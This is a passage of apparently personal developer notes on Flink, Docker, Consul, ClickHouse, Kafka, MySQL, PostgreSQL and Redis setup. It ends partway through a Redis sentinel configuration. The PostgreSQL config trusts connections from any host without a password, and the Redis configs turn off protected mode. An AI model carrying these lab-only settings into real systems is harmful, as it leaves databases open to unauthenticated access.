Programming
- 1: BigData
- 1.1: Flink
- 1.1.1: Flink Code
- 1.1.2: Flink Deploy
- 1.1.3: Flink Principle
- 2: Cloud
- 2.1: Consul
- 2.2: Docker
- 2.2.1: Docker Build
- 2.2.2: Docker Container
- 2.2.3: Docker Image
- 2.2.4: Docker Install
- 2.2.5: Docker Network
- 2.2.6: Docker Ps
- 2.2.7: Nsenter
- 3: Data
- 3.1: ClickHouse
- 3.1.1: Install ClickHouse
- 3.2: MQ
- 3.2.1: Kafka
- 3.3: MySQL
- 3.3.1: Install MySQL
- 3.4: PostgreSQL
- 3.5: Redis
- 3.5.1: Redis Cli
- 3.5.2: Redis Deploy
- 3.5.3: Redis Hack
- 3.5.4: Redis Persistence
- 3.5.5: Redis Sentinel
- 3.5.6: Redis Type
- 3.6: Sqlite
- 4: Lang
- 4.1: JVM
- 4.2: Python
- 4.2.1: Async Python
- 4.2.2: Database client in Python
- 4.2.3: Install Python
- 4.2.4: IPython
- 4.2.5: Python Pip
- 4.2.6: Python Std
- 4.2.7: Python Test
- 4.2.8: Python Web
- 4.3: Shell
- 4.3.1: Frequently used cmds
- 4.3.2: Gnu Tools
- 5: Ops
- 5.1: Os
- 5.2: VCS
- 5.2.1: Git
- 5.2.2: Git Checkout
- 5.2.3: Git Config
- 5.2.4: Git Hook
- 5.2.5: Git How-To
- 5.2.6: Git Log
1 - BigData
1.1 - Flink
1.1.1 - Flink Code
flink-client
CliFrontend
build StreamGraph
org.apache.flink.client.cli.CliFrontend#main
FLINK_CONF_DIR=./flink-dist/src/main/resources
# submit a job
run ./flink-examples/flink-examples-streaming/target/WordCount.jar
flink-runtime
StandaloneSessionClusterEntrypoint
run JobManager
org.apache.flink.runtime.entrypoint.StandaloneSessionClusterEntrypoint
-c ./flink-dist/src/main/resources
1.1.2 - Flink Deploy
Cluster
Starting a Session Cluster on Docker
# https://ci.apache.org/projects/flink/flink-docs-master/docs/deployment/resource-providers/standalone/docker/#starting-a-session-cluster-on-docker
FLINK_PROPERTIES="jobmanager.rpc.address: flink-jobmanager"
docker network create flink
# launch the JobManager
docker run -d \
--name=flink-jobmanager \
--network flink \
--publish 8081:8081 \
--env FLINK_PROPERTIES="${FLINK_PROPERTIES}" \
flink jobmanager
# one or more TaskManager containers
docker run -d \
--name=flink-taskmanager1 \
--network flink \
--env FLINK_PROPERTIES="${FLINK_PROPERTIES}" \
flink taskmanager
# submit a task
./bin/flink run ./examples/streaming/TopSpeedWindowing.jar
1.1.3 - Flink Principle
Overall architecture
The Flink system is made up of three parts: the Flink Program, the JobManager, and the TaskManager. The three communicate with each other via the Akka framework (Actor System), driving job progress by passing messages.
Flink Program: loads the user-submitted job code, parses it into a job execution topology, and submits that topology to the JobManager.
JobManager: derives a physical execution plan from the execution topology and sends the plan to the TaskManagers for execution. It also coordinates checkpointing: it continuously collects operator state from the TaskManagers and periodically produces a checkpoint, so that after a failure the system can restore its earlier state from the checkpoint.
TaskManager: manages the resources needed for task execution, runs the actual tasks, and passes the data stream a task produces on to the next task. Each TaskManager runs as a single JVM process; each TaskSlot runs one thread.
Consistency guarantees and failure handling
In a distributed setting, data gets lost, reordered, and duplicated. Reordering is handled by combining Event Time (the time at which an event actually occurred) with Watermarks (markers that indicate when the data up to some point is complete). For loss and duplication, Flink uses distributed snapshots to support Exactly Once semantics.
Distributed snapshots
Flink implements its distributed snapshot mechanism based on the Chandy-Lamport algorithm.
Flink periodically injects a special record, the barrier, into the normal data stream. When an operator processes a barrier, it saves its current state to persistent storage. An operator with several inputs has to align the barriers: once a barrier arrives on one input, the records that follow it on that input are buffered until every input has delivered the barrier; only then does the operator snapshot its state and emit the barrier to the downstream operators.
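A minimal Python sketch of barrier alignment (an illustration of the idea, not Flink's implementation; the channel names and the summing state are invented):

from collections import deque

class TwoInputOperator:
    """Toy two-input operator that sums values and aligns checkpoint barriers."""

    def __init__(self, inputs=("in1", "in2")):
        self.inputs = set(inputs)
        self.state = 0                 # the state captured by the snapshot
        self.buffered = {}             # records that arrived after a barrier, per channel
        self.barrier_seen = set()

    def on_record(self, channel, value):
        if channel in self.barrier_seen:
            # this channel already delivered the barrier: buffer until alignment
            self.buffered.setdefault(channel, deque()).append(value)
        else:
            self.state += value        # normal processing

    def on_barrier(self, channel, checkpoint_id):
        self.barrier_seen.add(channel)
        if self.barrier_seen == self.inputs:       # barrier received on every input
            print(f"checkpoint {checkpoint_id}: snapshot state={self.state}")
            # here the barrier would be emitted to the downstream operators,
            # then the buffered post-barrier records are replayed
            for buf in self.buffered.values():
                while buf:
                    self.state += buf.popleft()
            self.barrier_seen.clear()
            self.buffered.clear()

op = TwoInputOperator()
op.on_record("in1", 1)
op.on_barrier("in1", checkpoint_id=7)  # in1 aligned; later in1 records get buffered
op.on_record("in1", 100)               # buffered: must not leak into checkpoint 7
op.on_record("in2", 2)                 # in2 has not seen the barrier yet: processed
op.on_barrier("in2", checkpoint_id=7)  # aligned -> snapshot shows state=3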
Besides snapshotting each operator's state, a sink needs one extra step: writing its results to the external system. Flink implements this distributed transaction with a two-phase commit (2PC) protocol.
Flow control
When a downstream InputChannel receives data from an upstream ResultPartition, it computes a Credit value from the amount of data it has already buffered and the buffers it can still obtain from its LocalBufferPool and the NetworkBufferPool, and returns that value upstream. The upstream side decides how much data to send based on the Credit; like a credit card limit, it must not be overdrawn. When the downstream side becomes congested, the Credit drops to 0 and the upstream side stops sending. The congestion pressure keeps propagating upstream, producing backpressure.
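A toy model of the Credit mechanism (a simplification for illustration, not Flink's code): the receiver announces a credit equal to its free buffers, the sender never exceeds it, and a congested receiver announces 0, which stalls the sender and propagates backpressure.

class Receiver:
    def __init__(self, total_buffers):
        self.free_buffers = total_buffers
        self.queue = []

    def announce_credit(self):
        return self.free_buffers          # credit = buffers we can still accept

    def receive(self, record):
        assert self.free_buffers > 0, "sender overdrew its credit"
        self.free_buffers -= 1
        self.queue.append(record)

    def drain(self, n):                   # downstream consumes, freeing buffers
        for _ in range(min(n, len(self.queue))):
            self.queue.pop(0)
            self.free_buffers += 1

def send(backlog, receiver):
    credit = receiver.announce_credit()   # receiver tells the sender how much it may send
    for _ in range(min(credit, len(backlog))):
        receiver.receive(backlog.pop(0))

backlog = list(range(10))
rx = Receiver(total_buffers=4)
send(backlog, rx)        # sends 4 records, credit exhausted
send(backlog, rx)        # credit is 0: nothing is sent -> backpressure
rx.drain(2)              # downstream consumes 2 records
send(backlog, rx)        # credit is 2 again: 2 more records flow
print(len(backlog))      # 4 records still waiting upstream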
2 - Cloud
2.1 - Consul
install
docker run -d --name=consul1 \
-p 8500:8500 \
-e CONSUL_BIND_INTERFACE=eth0 \
consul
docker run -d --name consul2 -e CONSUL_BIND_INTERFACE=eth0 \
consul agent -dev -join=172.17.0.2
# query for all the members in the cluster
docker exec -t consul1 consul members
curl http://localhost:8500/v1/health/service/consul?pretty
2.2 - Docker
2.2.1 - Docker Build
build
docker build [OPTIONS] PATH | URL | -
# use the Dockerfile in the current path to build an image
docker build -t [repository]/[username]/[remote_image_name]:[tag] ./
# or
docker build -t [local_image_name] ./
docker image tag [local_image_name] [repository]/[username]/[remote_image_name]:[tag]
# finally
docker push [repository]/[username]/[remote_image_name]:[tag]
- -f, --file : Name of the Dockerfile
- --force-rm : Always remove intermediate containers
- --no-cache : Do not use cache when building the image
- --pull : Always attempt to pull a newer version of the image
- --quiet, -q : Only print image ID on success
- --tag, -t : Name and optionally a tag in the 'name:tag' format
- --network : Set the networking mode for the RUN instructions during build (default "default")
Dockerfile
ENV FOO=BAR
# cid=$(docker run -e FOO=BAR <image>)
# docker commit $cid
.dockerignore
.git
README.md
2.2.2 - Docker Container
run
# create a detached (daemonized) container
docker run -itd ubuntu:14.04 /bin/bash
# docker ps
# attach to the container
docker attach <container_id>
# when several terminals attach to the same container, all of them mirror the same output
# enter a Docker container
docker exec -it CONTAINER_NAME /bin/bash
# create a new container and run a command in it
docker run [OPTIONS] IMAGE [COMMAND] [ARG...]
OPTIONS:
- -a stdin: attach to STDIN/STDOUT/STDERR
- -d: run the container in the background and print the container ID
- -i: run in interactive mode, usually together with -t
- -p: port mapping, host_port:container_port
- -v: mount a host directory into the container
- -t: allocate a pseudo-TTY, usually together with -i
- --name="cname": assign a name to the container
- --dns 8.8.8.8: DNS servers for the container (defaults to the host's)
- --dns-search example.com: DNS search domain for the container (defaults to the host's)
- -h "hostname": set the container's hostname
- -e property=value: set an environment variable
- --env-file=[]: read environment variables from the given file
- --cpuset="0-2" or --cpuset="0,1,2": pin the container to the given CPUs
- -m: maximum memory the container may use
- --net="bridge": network mode, one of bridge/host/none/container:<name|id>
- --link=[]: add a link to another container
- --expose=[]: expose a port or a range of ports
docker start # start one or more stopped containers
docker stop # stop a running container
docker restart # restart a container
docker pause # pause all processes in the container
docker unpause # unpause all processes in the container
attach
# make sure CTRL-D or CTRL-C does not stop the container
docker attach --sig-proxy=false <container_id>
rm
OPTIONS:
- -f: force-remove a running container via SIGKILL
- -l: remove the network link between containers, not the container itself
- -v: remove the volumes associated with the container
create
# create a new container without starting it
docker create [OPTIONS] IMAGE [COMMAND] [ARG...]
exec
# run a command inside a running container
docker exec [OPTIONS] CONTAINER COMMAND [ARG...]
# tty size
docker exec -it -e LINES=$(tput lines) -e COLUMNS=$(tput cols) <cid> bash
OPTIONS:
- -d: detached mode, run in the background
- -i: keep STDIN open even if not attached
- -t: allocate a pseudo-TTY
kill
# Kill one or more running containers
# <signal>
# KILL
docker kill -s <signal> <container>
cp
docker cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|-
docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH
2.2.3 - Docker Image
search
# --limit int Max number of search results (default 25)
# --no-trunc Don't truncate output
docker search <something>
pull
docker pull debian
# daemon mode
container_id=`docker run -itd debian /bin/bash `
docker exec -it $container_id /bin/bash
docker attach $container_id
push
docker commit <container_id> <image_name>
docker tag <image_name> <username>/<imagename>:<tagname>
docker login -u <username> -p <password>
docker push <username>/<imagename>:<tagname>
docker logout
tag
docker tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]
commit
# Create a new image from a container's changes
docker commit <container_id> <image_name>
# -a, --author string Author
# -m, --message string Commit message
cid=$(docker run -e FOO=BAR <image>)
docker commit $cid
images
# -a, --all Show all images (default hides intermediate images)
# --digests Show digests
# --no-trunc Don't truncate output
# -q, --quiet Only show numeric IDs
docker images
rmi
# -f, --force
docker rmi [OPTIONS] IMAGE [IMAGE...]
history
# Show the history of an image
# --no-trunc Don't truncate output
docker history [OPTIONS] IMAGE
save
# Save one or more images to a tar archive
docker save -o <tar_file_name> <image>
load
# Load an image from a tar archive or STDIN.
docker load -i <tar_file_name>
dockertags.sh
#!/bin/bash
if [ $# -lt 1 ]
then
cat << HELP
dockertags -- list all tags for a Docker image on a remote registry.
EXAMPLE:
- list all tags for ubuntu:
dockertags ubuntu
- list all php tags containing apache:
dockertags php apache
HELP
exit 1
fi
image="$1"
tags=`wget -q https://registry.hub.docker.com/v1/repositories/${image}/tags -O - | sed -e 's/[][]//g' -e 's/"//g' -e 's/ //g' | tr '}' '\n' | awk -F: '{print $3}'`
if [ -n "$2" ]
then
tags=` echo "${tags}" | grep "$2" `
fi
echo "${tags}"
2.2.4 - Docker Install
docker
docker-ce
# https://docs.docker.com/engine/install/debian/
sudo apt-get install \
apt-transport-https \
ca-certificates \
curl \
gnupg \
lsb-release -y
curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo \
"deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian \
$(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt-get update
sudo apt-get install docker-ce docker-ce-cli containerd.io
sudo systemctl status docker
sudo usermod -aG docker $USER
debian/ubuntu
sudo apt-get install docker.io
# in order to run docker without the sudo prefix
sudo usermod -aG docker $USER
sudo systemctl start docker
sudo docker run --rm hello-world
sudo apt-get autoremove --purge docker.io
rm -rf /var/lib/docker
centos/fedora
sudo dnf install docker
# start the Docker service
# sudo service docker start
sudo systemctl start docker
docker run --rm hello-world
docker version
docker info
# to avoid typing sudo, add the user to the docker group
sudo groupadd docker
sudo usermod -aG docker $USER
2.2.5 - Docker Network
--link
# source container
docker run --name mysql -e MYSQL_ROOT_PASSWORD=server -d mysql
# receiving container
# inside the nginx container, use the alias (aliasmysql) as the hostname to connect to the MySQL service
docker run --name nginx --link mysql:aliasmysql -d nginx
Docker imports every environment variable defined in the source container into the receiving container, where they can be read to obtain connection info.
Name resolution works by adding name-to-IP entries to /etc/hosts in the receiving container.
network
A Docker container's network can run in five modes:
1) bridge mode, --net=bridge (the default). Docker creates a separate network namespace for the container, with its own NIC and a complete private network stack; this is the most common mode, and the one used when docker run is invoked without --net. Installing Docker adds the docker0 bridge to the system; a new container obtains, DHCP-style, an IP in docker0's subnet and attaches to docker0, which connects the container to the host network.
2) host mode, --net=host. The container uses the host's network namespace directly: it has no independent network environment of its own and uses the host's IP and ports.
3) none mode, --net=none. A separate network namespace is created but left completely unconfigured; the container only has lo, and the user builds any network setup on top of it. Docker does no network configuration at all in this mode; you add NICs and assign IPs yourself. This is also the mode required if you want to configure container IPs with pipework.
4) container mode, --net=container:NAME_or_ID. Like host mode, except the container shares the network namespace of the named container: the two share IP and ports but stay isolated in everything else (filesystem, processes, ...). They can reach each other via localhost and behave as one unit.
5) user-defined: added in Docker 1.9, this lets containers use third-party network implementations or dedicated bridge networks, providing network isolation; see the sketch after this list.
In user-defined mode, any third-party network driver Docker supports can be used to customize the container network. Docker 1.9+ also ships two built-in custom network driver types, bridge and overlay, and can integrate third-party implementations such as calico, weave and openvswitch.
Apart from the built-in bridge driver, all the other drivers support cross-host container communication. For networks based on the bridge driver, Docker automatically creates iptables rules that keep them isolated from other networks and from docker0.
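A sketch of the user-defined mode with the docker-py SDK (pip install docker; assumes a local Docker daemon and the redis image; the network and container names here are arbitrary). Containers on the same user-defined bridge resolve each other by name through the embedded DNS:

import time
import docker

client = docker.from_env()

# user-defined bridge network: isolation plus name-based DNS between members
net = client.networks.create("appnet", driver="bridge")

db = client.containers.run("redis", name="db", network="appnet", detach=True)
time.sleep(1)  # crude wait for redis-server to come up

# 'db' resolves via Docker's embedded DNS on the user-defined network
probe = client.containers.run("redis", command="redis-cli -h db ping",
                              name="probe", network="appnet", detach=True)
probe.wait()
print(probe.logs().decode())  # expect: PONG

for c in (probe, db):
    c.remove(force=True)
net.remove()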
WARNING: IPv4 forwarding is disabled. Networking will not work.
echo "net.ipv4.ip_forward=1" >>/usr/lib/sysctl.d/00-system.conf
systemctl restart network && systemctl restart docker
volume
backup
docker volume create data
docker run -v data:/path/to/data --name data_container \
-d -it --rm \
busybox /bin/sh
docker run --rm --volumes-from data_container -v $(pwd):/backup busybox tar cvf /backup/data_backup.tar /path/to/data
restore
docker run -v data:/path/to/data --name data_container2 \
-d -it --rm \
busybox /bin/sh
docker run --rm --volumes-from data_container2 \
-v $(pwd):/backup busybox \
sh -c "cd /path/to/data && tar xvf /backup/data_backup.tar --strip 1"
2.2.6 - Docker Ps
ps
docker ps -a
# Show the latest created container, Only display numeric IDs
docker ps -lq
docker ps --format 'table {{.Names}}\t{{.Image}}'
vim ~/.docker/config.json
{
"psFormat": "table {{.Names}}\\t{{.Image}}\\t{{.RunningFor}} ago\\t{{.Status}}\\t{{.Command}}",
"imagesFormat": "table {{.Repository}}\\t{{.Tag}}\\t{{.ID}}\\t{{.Size}}"
}
OPTIONS:
- -a: show all containers, including stopped ones
- -f: filter the output by condition
- --format: template for the output
- -l: show the most recently created container
- -n: show the n most recently created containers
- --no-trunc: don't truncate output
- -q: quiet mode, only show container IDs
- -s: show total file sizes
inspect
# print the PID of the container's first process
docker inspect -f {{.State.Pid}} <container_id>
docker inspect --format='{{.RootFS.Layers}}' <image_id>
docker inspect --format='{{.NetworkSettings.IPAddress }}' <container_id>
Get the metadata of a container/image
OPTIONS:
- -f: template for the output
- -s: show total file sizes
- --type: return JSON for the given type
diff
docker diff <container_id>
top
Show the processes running inside a container
docker top [OPTIONS] CONTAINER [ps OPTIONS]
# show process info for every running container
for i in `docker ps |grep Up|awk '{print $1}'`;do echo \ &&docker top $i; done
logs
Fetch a container's logs
docker logs [OPTIONS] CONTAINER
tail -f /var/lib/docker/containers/<cid>/<cid>-json.log
# collect container logs with fluentd
docker run -d \
--log-driver=fluentd \
--log-opt fluentd-address=${fluentd_address} \
--log-opt tag="docker.{{.Name}}" \
nginx
OPTIONS:
- -f: follow the log output
- --since: show all logs since the given time
- -t: show timestamps
- --tail: show only the last N log lines
Docker engine logs
OS | Location |
---|---|
Ubuntu (14.04) | /var/log/upstart/docker.log |
Ubuntu (16.04) | journalctl -u docker.service |
CentOS 7 / RHEL 7 / Fedora | journalctl -u docker.service |
CoreOS | journalctl -u docker.service |
OpenSuSE | journalctl -u docker.service |
OSX | ~/Library/Containers/com.docker.docker/Data/com.docker.driver.amd64-linux/log/docker.log |
Debian GNU/Linux 7 | /var/log/daemon.log |
Debian GNU/Linux 8 | journalctl -u docker.service |
Boot2Docker | /var/log/docker.log |
events
Get real-time events from the server
docker events [OPTIONS]
OPTIONS:
- -f: filter events by condition
- --since: show all events since the given timestamp, e.g. --since="2016-07-01"
- --until: stream events until the given timestamp
export
Export a container's filesystem as a tar archive to STDOUT.
docker export [OPTIONS] CONTAINER
OPTIONS:
- -o: write the output to a file instead of STDOUT
wait
Block until a container stops, then print its exit code.
docker wait CONTAINER [CONTAINER...]
port
List the container's port mappings, or look up the public-facing port that is NAT-ed to PRIVATE_PORT
docker port CONTAINER [PRIVATE_PORT[/PROTO]]
$
# Delete all containers
docker rm $(docker ps -a -q)
# Delete all images
docker rmi $(docker images -q)
/var/lib/docker
- /var/lib/docker/devicemapper/devicemapper/data # storage pool data
- /var/lib/docker/devicemapper/devicemapper/metadata # storage pool metadata
- /var/lib/docker/devicemapper/metadata/ # device_id, size, transaction_id and initialization info
- /var/lib/docker/devicemapper/mnt # mount info
- /var/lib/docker/container/ # container info
- /var/lib/docker/graph/ # image layers: details, sizes and dependencies
- /var/lib/docker/repositores-devicemapper # basic image info
- /var/lib/docker/tmp # docker temp directory
- /var/lib/docker/trust # docker trust directory
- /var/lib/docker/volumes # docker volumes directory
2.2.7 - Nsenter
nsenter
wget https://www.kernel.org/pub/linux/utils/util-linux/v2.32/util-linux-2.32.tar.gz
tar -zxf util-linux-2.32.tar.gz && cd util-linux-2.32
./configure
make
# make && make install could overwrite the OS's own low-level tools
cp nsenter /usr/local/bin/
docker-enter
#!/bin/sh
if [ -e $(dirname "$0")/nsenter ]; then
# with boot2docker, nsenter is not in the PATH but it is in the same folder
NSENTER=$(dirname "$0")/nsenter
else
NSENTER=nsenter
fi
if [ -z "$1" ]; then
echo "Usage: $(basename "$0") CONTAINER [COMMAND [ARG]...]"
echo ""
echo "Enters the Docker CONTAINER and executes the specified COMMAND."
echo "If COMMAND is not specified, runs an interactive shell in CONTAINER."
else
PID=$(docker inspect --format "{{.State.Pid}}" "$1")
if [ -z "$PID" ]; then
exit 1
fi
shift
OPTS="--target $PID --mount --uts --ipc --net --pid --"
if [ -z "$1" ]; then
# No command given.
# Use su to clear all host environment variables except for TERM,
# initialize the environment variables HOME, SHELL, USER, LOGNAME, PATH,
# and start a login shell.
"$NSENTER" $OPTS su - root
else
# Use env to clear all host environment variables.
"$NSENTER" $OPTS env --ignore-environment -- "$@"
fi
fi
3 - Data
3.1 - ClickHouse
3.1.1 - Install ClickHouse
docker
docker run -d --name clickhouse \
--ulimit nofile=262144:262144 \
-p 8123:8123 -p 9000:9000 \
-e CLICKHOUSE_DB=test \
-e CLICKHOUSE_USER=root -e CLICKHOUSE_PASSWORD=root \
-e CLICKHOUSE_DEFAULT_ACCESS_MANAGEMENT=1 \
clickhouse/clickhouse-server
echo 'SELECT version()' | curl 'http://localhost:8123/' --data-binary @-
3.2 - MQ
3.2.1 - Kafka
install
# https://github.com/provectus/kafka-ui
docker run -p 8080:8080 \
-e KAFKA_CLUSTERS_0_NAME=local \
-e KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS=kafka:9092 \
-d provectuslabs/kafka-ui
3.3 - MySQL
3.3.1 - Install MySQL
Container
docker run -d -it --name mysql57 \
-e MYSQL_ROOT_PASSWORD=root \
-p 3306:3306 \
mysql:5.7
3.4 - PostgreSQL
install
container
# -e POSTGRES_USER=postgres \
# -e POSTGRES_DB=postgres \
docker run -d -it --name postgres15 \
-e POSTGRES_PASSWORD=postgres \
-v ${PWD}/postgresql.conf:/var/lib/postgresql/data/postgresql.conf \
-v ${PWD}/pg_hba.conf:/var/lib/postgresql/data/pg_hba.conf \
-v ${PWD}/data:/var/lib/postgresql/data \
-p 5432:5432 \
postgres:15
docker exec -it postgres15 psql -hlocalhost -U postgres
GRANT ALL PRIVILEGES ON DATABASE postgres to postgres;
ALTER SCHEMA public OWNER to postgres;
GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO postgres;
GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO postgres;
select name, setting from pg_settings where category = 'File Locations' ;
/var/lib/postgresql/data/pg_hba.conf
local all all trust
host all all 127.0.0.1/32 trust
host all all ::1/128 trust
local replication all trust
host replication all 127.0.0.1/32 trust
host replication all ::1/128 trust
host all all 0.0.0.0/0 trust
/var/lib/postgresql/data/postgresql.conf
listen_addresses = '*'
#port = 5432 # (change requires restart)
max_connections = 100
shared_buffers = 128MB
dynamic_shared_memory_type = posix
max_wal_size = 1GB
min_wal_size = 80MB
log_timezone = 'Etc/UTC'
datestyle = 'iso, mdy'
timezone = 'Etc/UTC'
lc_messages = 'en_US.utf8'
lc_monetary = 'en_US.utf8'
lc_numeric = 'en_US.utf8'
lc_time = 'en_US.utf8'
default_text_search_config = 'pg_catalog.english'
3.5 - Redis
3.5.1 - Redis Cli
Transactions
multi                  # start a transaction
exec                   # commit: run all commands queued in the transaction
discard                # abort the transaction, clearing the queue
watch key1 [key2...]   # watch keys; if one changes before exec, the transaction is aborted
unwatch                # stop watching all keys; disconnecting also unwatches
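The same commands from Python with redis-py (pip install redis; assumes a local Redis on 6379). A pipeline's watch/multi/execute map onto WATCH/MULTI/EXEC, with WatchError signalling that a watched key changed:

import redis

r = redis.Redis(host="localhost", port=6379)
r.set("counter", 0)

with r.pipeline() as pipe:
    while True:
        try:
            pipe.watch("counter")            # WATCH: abort if it changes before EXEC
            current = int(pipe.get("counter"))
            pipe.multi()                     # MULTI: start queueing commands
            pipe.set("counter", current + 1)
            pipe.execute()                   # EXEC: run the queue atomically
            break
        except redis.WatchError:
            continue                         # the key changed under us: retry

print(r.get("counter"))                      # b'1'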
Publish and subscribe
subscribe channel1 [channel2...]     # subscribe to channels; psubscribe is the glob-pattern version
unsubscribe channel1 [channel2...]   # unsubscribe from channels; punsubscribe is the glob-pattern version
publish channel message              # publish a message to a channel
pubsub                               # introspection into the pub/sub system
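Publish/subscribe from redis-py (the channel names are illustrative); psubscribe takes the same glob patterns as the CLI:

import redis

r = redis.Redis()
p = r.pubsub()
p.psubscribe("news.*")                 # pattern subscription

r.publish("news.sports", "hello")

for msg in p.listen():                 # the first message is the psubscribe ack
    if msg["type"] == "pmessage":
        print(msg["channel"], msg["data"])   # b'news.sports' b'hello'
        break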
Type operations
keys *
string
set k v
# string
type k
get k
# return old value
getset k v
mset k1 v1 k2 v2
mget k1 k2
# set if not exist
msetnx k1 v1 k2 v2
# append to the tail
append k v
# string length
strlen k
# increment a number string, k++
incr k
decr k
# k += d
incrby k d
decrby k d
# overwrite part of the string, starting at offset
setrange k offset v
# substring, both ends inclusive
getrange k start end
# set or clear the bit at offset
setbit k offset v
setbit k offset v
setnx k v
# expire in seconds
set k v ex seconds nx
list
# prepend one or more values to the list at key
lpush k v1 v2
# push if exist
lpushx k v
# return elements in the given range, offsets start=0 and end=-1
lrange key start end
# remove and return the head element of the list
lpop k
llen k
# starting from the head, remove elements equal to value
lrem k count v
lset k index v
# return the element at index
lindex k index
# trim the list to the given range
ltrim k start end
# insert value before or after the pivot value p
linsert k before p v
# append one or more values to the list at key
rpush k v1 v2
rpushx k v
rpop k
# atomically: pop the tail element of src and push it onto dest
rpoplpush src dest
hash
hset k f v
# set field to value only if the field does not yet exist
hsetnx k f v
hexists k f
hlen k
# delete one or more fields; missing fields are ignored
hdel k f1 f2
# ++
hincrby k f increment
hgetall k
# return all field names in the hash
hkeys k
# return all field values in the hash
hvals k
# set several field-value pairs at once
hmset k f1 v1 f2 v2
set
# members already in the set are ignored
sadd k m1 m2
smembers k
# number of members in the set
scard k
# is member a member of the set?
sismember k m
# remove and return a random member of the set
spop k
# return a random member without removing it
srandmember k
# remove one or more members; missing members are ignored
srem k m1 m2
# atomically move member from the source set to the destination set
smove src dest m
sdiff set1 set2
sdiffstore diffSet set1 set2
sunion set1 set2
sinterstore interSet set1 set2
zset
zadd k score1 m1 score2 m2
zcard k
zincrby k increment m
# count members whose score is between min and max
# (inclusive by default)
zcount k min max
# return members in the given rank range,
# ordered by score ascending
zrange k start end withscores
# ordered by score descending
zrevrange k start end withscores
# return all members whose score is between min and max
# (inclusive)
zrangebyscore k min max withscores limit offset count
# return the rank of member, with members
# ordered by score ascending
zrank k m
zrevrank k m
# return the score of member
zscore k m
zrem k m1 m2
# remove all members in the given rank range
zremrangebyrank k start end
zremrangebyscore k min max
info
info memory
used_memory               # includes used swap space
used_memory_human
used_memory_rss           # same as top or ps report; excludes used swap space
mem_fragmentation_ratio   # used_memory_rss / used_memory; a healthy value is about 1.03 for jemalloc
mem_allocator             # libc, jemalloc or tcmalloc
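The same fields can be read programmatically; with redis-py, info("memory") returns the section as a dict:

import redis

mem = redis.Redis().info("memory")
ratio = mem["mem_fragmentation_ratio"]     # used_memory_rss / used_memory
print(mem["used_memory_human"], mem["mem_allocator"], ratio)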
3.5.2 - Redis Deploy
container
docker run -it -d --name redis -p 6379:6379 redis
sentinel
localhost
config set protected-mode no
multi master (3 master, 3 slave, and 3 sentinel)
cat << EOF > redis.conf
port 7000
daemonize yes
cluster-enabled yes
cluster-config-file 7000/nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF
mkdir 7000 7001 7002 7003 7004 7005
cat redis.conf | sed s/7000/7000/g > 7000/redis.conf
cat redis.conf | sed s/7000/7001/g > 7001/redis.conf
cat redis.conf | sed s/7000/7002/g > 7002/redis.conf
cat redis.conf | sed s/7000/7003/g > 7003/redis.conf
cat redis.conf | sed s/7000/7004/g > 7004/redis.conf
cat redis.conf | sed s/7000/7005/g > 7005/redis.conf
export redis_server='../redis/src/redis-server'
$redis_server 7000/redis.conf
$redis_server 7001/redis.conf
$redis_server 7002/redis.conf
$redis_server 7003/redis.conf
$redis_server 7004/redis.conf
$redis_server 7005/redis.conf
# three master & three slave
../redis/src/redis-trib.rb create --replicas 1 127.0.0.1:7000 127.0.0.1:7001 \
127.0.0.1:7002 127.0.0.1:7003 127.0.0.1:7004 127.0.0.1:7005
cat << EOF > sentinel.conf
port 26379
daemonize yes
sentinel monitor mymaster1 127.0.0.1 %port1 2
sentinel down-after-milliseconds mymaster1 60000
sentinel failover-timeout mymaster1 180000
sentinel parallel-syncs mymaster1 1
sentinel monitor mymaster2 127.0.0.1 %port2 2
sentinel down-after-milliseconds mymaster2 60000
sentinel failover-timeout mymaster2 180000
sentinel parallel-syncs mymaster2 1
sentinel monitor mymaster3 127.0.0.1 %port3 2
sentinel down-after-milliseconds mymaster3 60000
sentinel failover-timeout mymaster3 180000
sentinel parallel-syncs mymaster3 1
EOF
# assuming the three masters end up on ports 7000-7002 (check the actual assignment after redis-trib runs)
cat sentinel.conf | sed s/26379/26379/g | sed -e 's/%port1/7000/g' -e 's/%port2/7001/g' -e 's/%port3/7002/g' > sentinel_0.conf
cat sentinel.conf | sed s/26379/36379/g | sed -e 's/%port1/7000/g' -e 's/%port2/7001/g' -e 's/%port3/7002/g' > sentinel_1.conf
cat sentinel.conf | sed s/26379/46379/g | sed -e 's/%port1/7000/g' -e 's/%port2/7001/g' -e 's/%port3/7002/g' > sentinel_2.conf
export redis_server='../redis/src/redis-server'
$redis_server sentinel_0.conf --sentinel
$redis_server sentinel_1.conf --sentinel
$redis_server sentinel_2.conf --sentinel
single master(1 master, 5 slave, and 3 sentinel)
cat << EOF > redis.conf
port 7000
daemonize yes
protected-mode no
# cluster-enabled yes
cluster-config-file 7000/nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF
mkdir 7000 7001 7002 7003 7004 7005
cat redis.conf | sed s/7000/7000/g > 7000/redis.conf
cat redis.conf | sed s/7000/7001/g > 7001/redis.conf
cat redis.conf | sed s/7000/7002/g > 7002/redis.conf
cat redis.conf | sed s/7000/7003/g > 7003/redis.conf
cat redis.conf | sed s/7000/7004/g > 7004/redis.conf
cat redis.conf | sed s/7000/7005/g > 7005/redis.conf
export redis_server='../redis/src/redis-server'
# master
$redis_server 7000/redis.conf
# slave
$redis_server 7001/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7002/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7003/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7004/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7005/redis.conf --slaveof 127.0.0.1 7000
cat << EOF > sentinel.conf
port 26379
daemonize yes
protected-mode no
sentinel monitor mymaster 127.0.0.1 7000 2
sentinel down-after-milliseconds mymaster 60000
sentinel failover-timeout mymaster 180000
sentinel parallel-syncs mymaster 1
EOF
cat sentinel.conf | sed s/26379/26379/g > sentinel_0.conf
cat sentinel.conf | sed s/26379/36379/g > sentinel_1.conf
